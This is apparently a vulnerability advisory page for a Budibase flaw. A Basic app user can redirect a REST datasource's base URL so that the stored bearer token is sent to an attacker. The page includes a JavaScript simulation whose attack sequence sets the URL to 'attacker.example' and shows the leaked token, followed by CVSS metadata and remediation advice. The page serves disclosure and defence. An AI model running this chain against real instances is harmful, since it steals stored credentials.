Description
Budibase is an open-source low-code platform. Prior to 3.39.0, the single-datasource GET and PUT routes are guarded by generic TABLE READ, not by Builder/Admin permission or datasource-specific ownership/resource checks. The built-in Basic app user role maps to the WRITE permission set, which includes table read/write and query write. A Basic user can therefore read an existing REST datasource, receive redacted authConfigs values, submit an update that changes only config.url while keeping the redacted placeholders, and trigger an existing saved relative-path REST query. During update, mergeConfigs() restores the old stored secret when it sees the redaction placeholder. During query execution, Budibase prefixes the attacker-controlled datasource config.url to the relative query path and applies the resolved stored auth headers. The result is server-side disclosure of the builder-configured REST Authorization secret to an attacker-controlled listener. This vulnerability is fixed in 3.39.0.
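The chain above has three moving parts: the GET route hands a Basic user a redacted copy of the datasource, the PUT route's mergeConfigs() swaps the placeholder back for the stored secret, and query execution glues the (now attacker-controlled) base URL onto the saved relative path before attaching that secret. The following is an added model of that flow written for this page; it is not Budibase code. The data, the placeholder string, the role-to-permission map and the shape of the fixed route are constructed assumptions; only the names (mergeConfigs, authConfigs, config.url, Basic/Builder, TABLE READ) follow the advisory wording.

```javascript
// Model of the CVE-2026-48152 flow, added for this page. Not Budibase code:
// the data, the REDACTED placeholder value, the role->permission map and the
// shape of the fixed route are constructed assumptions; only the names
// (mergeConfigs, authConfigs, config.url, Basic/Builder, TABLE READ) follow
// the advisory wording.
'use strict';

const REDACTED = '--secret-value--';            // assumed redaction placeholder
const PERMISSIONS = {                           // assumed role -> permission set
  BASIC:   new Set(['TABLE_READ', 'TABLE_WRITE', 'QUERY_WRITE']),            // the WRITE set
  BUILDER: new Set(['TABLE_READ', 'TABLE_WRITE', 'QUERY_WRITE', 'BUILDER']),
};

// Constructed stored state: a REST datasource holding a builder-configured
// bearer token and a saved query that uses a relative path.
function makeStore() {
  return {
    datasources: {
      ds_crm: {
        _id: 'ds_crm',
        source: 'REST',
        config: {
          url: 'https://crm.internal.example',
          authConfigs: [{ name: 'crm-token', type: 'bearer', config: { token: 'crm-secret-123' } }],
        },
      },
    },
    queries: {
      q_list: { _id: 'q_list', datasourceId: 'ds_crm', path: '/v1/contacts', authConfigId: 'crm-token' },
    },
  };
}

const clone = (o) => JSON.parse(JSON.stringify(o));

// GET response: every auth secret is replaced by the placeholder.
function redact(ds) {
  const out = clone(ds);
  for (const a of out.config.authConfigs || []) {
    for (const k of Object.keys(a.config)) a.config[k] = REDACTED;
  }
  return out;
}

// PUT merge: a placeholder means "keep what is stored", so the old secret is
// restored alongside whatever else the caller changed (here: config.url).
function mergeConfigs(updated, old) {
  const merged = clone(updated);
  for (const a of merged.config.authConfigs || []) {
    const prev = (old.config.authConfigs || []).find((p) => p.name === a.name);
    for (const k of Object.keys(a.config)) {
      if (a.config[k] === REDACTED && prev) a.config[k] = prev.config[k];
    }
  }
  return merged;
}

// Pre-3.39.0 behaviour as described: the route only demands generic TABLE_READ,
// which the Basic role's WRITE set already contains.
function updateDatasourceVulnerable(store, role, body) {
  if (!PERMISSIONS[role].has('TABLE_READ')) throw new Error('forbidden');
  store.datasources[body._id] = mergeConfigs(body, store.datasources[body._id]);
}

// Assumed shape of the fix: datasource writes require builder permission.
function updateDatasourceFixed(store, role, body) {
  if (!PERMISSIONS[role].has('BUILDER')) throw new Error('forbidden');
  store.datasources[body._id] = mergeConfigs(body, store.datasources[body._id]);
}

// Query execution: datasource base URL + relative query path, with the
// resolved (unredacted) secret applied as the Authorization header.
function buildRequest(store, queryId) {
  const q = store.queries[queryId];
  const ds = store.datasources[q.datasourceId];
  const auth = ds.config.authConfigs.find((a) => a.name === q.authConfigId);
  return { url: ds.config.url + q.path, headers: { Authorization: `Bearer ${auth.config.token}` } };
}

// The attack sequence from the advisory, run as a Basic user against a fresh
// store: read (redacted), change only config.url, trigger the saved query.
function runAttack(updateFn) {
  const store = makeStore();
  const body = redact(store.datasources.ds_crm);
  body.config.url = 'https://attacker.example';   // constructed attacker listener
  try {
    updateFn(store, 'BASIC', body);
  } catch (e) {
    return { blocked: true, reason: e.message };
  }
  return { blocked: false, request: buildRequest(store, 'q_list') };
}

console.log('vulnerable:', JSON.stringify(runAttack(updateDatasourceVulnerable)));
console.log('fixed:     ', JSON.stringify(runAttack(updateDatasourceFixed)));
```

Run with node; the vulnerable case prints a request bound for the attacker host carrying the real bearer token, the fixed case prints a rejection. Note that the placeholder merge is the intended redaction contract, not the bug: it only becomes exploitable because the PUT route accepts the write from a role that should never be allowed to touch datasource configuration, which is why the fix belongs in the route's authorization check rather than in mergeConfigs().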
Published: 2026-05-27
Score: 8.1 High
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

A flaw in Budibase prior to version 3.39.0 allows a user with Basic app privileges to modify the base URL of a REST datasource while keeping redacted placeholders, causing the system to merge the original authentication configuration and then expose that confidential secret through an attacker-controlled listener when a relative query is executed.

Affected Systems

Any Budibase installation running a version older than 3.39.0 is affected. An instance is exposed as soon as it has a REST datasource with stored auth configuration and at least one saved relative-path query against it: no extra grant is needed, because the built-in Basic app role already carries the WRITE permission set that reaches the datasource GET and PUT routes.

Risk and Exploitability

With a CVSS score of 8.1 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N) the risk is high. The EPSS score is below 1% and the vulnerability is not listed in KEV, but the only precondition is an authenticated account holding the default Basic app role, the lowest-privilege role an app user receives, and the SSVC assessment records a public proof of concept. An attacker who holds or compromises such an account can change the datasource URL to point to a listener they control, trigger the saved query, and receive the stored Authorization header, obtaining the builder-configured credential without any interaction from a builder or admin.

Generated by OpenCVE AI on May 27, 2026 at 21:03 UTC.

Remediation

Fixed in Budibase 3.39.0; no workaround is documented.

OpenCVE Recommended Actions

  • Upgrade Budibase to version 3.39.0 or newer, which restricts the single-datasource routes to builder/admin permission instead of generic TABLE READ.
  • Until the upgrade is applied, treat every Basic app account as able to rewrite REST datasource URLs: limit those accounts to trusted users, since the vulnerable PUT route is reachable with the default WRITE permission set the role carries.
  • Audit existing instances: review each REST datasource's config.url for unexpected hosts, check access logs for PUT requests to the datasource routes from non-builder accounts, and rotate any REST credential stored in a datasource that may have been exfiltrated.

Advisories

No advisories yet.

History

Thu, 28 May 2026 02:30:00 +0000

  Type                  Values Removed   Values Added
  First Time appeared   -                Budibase; Budibase budibase
  Vendors & Products    -                Budibase; Budibase budibase

Wed, 27 May 2026 20:30:00 +0000

  Type                  Values Removed   Values Added
  Metrics               -                ssvc: {'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Wed, 27 May 2026 17:45:00 +0000

  Type                  Values Removed   Values Added
  Description           -                (added; text as shown under Description above)
  Title                 -                Budibase: Basic app users can exfiltrate stored REST datasource auth by rewriting datasource base URL
  Weaknesses            -                CWE-863
  References            -                -
  Metrics               -                cvssV3_1: {'score': 8.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}


MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-05-27T18:41:12.772Z

Reserved: 2026-05-20T23:12:43.031Z

Link: CVE-2026-48152

Vulnrichment

Updated: 2026-05-27T18:38:34.599Z

NVD

Status : Deferred

Published: 2026-05-27T18:16:27.723

Modified: 2026-05-27T20:16:40.943

Link: CVE-2026-48152

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-05-28T02:15:03Z

Weaknesses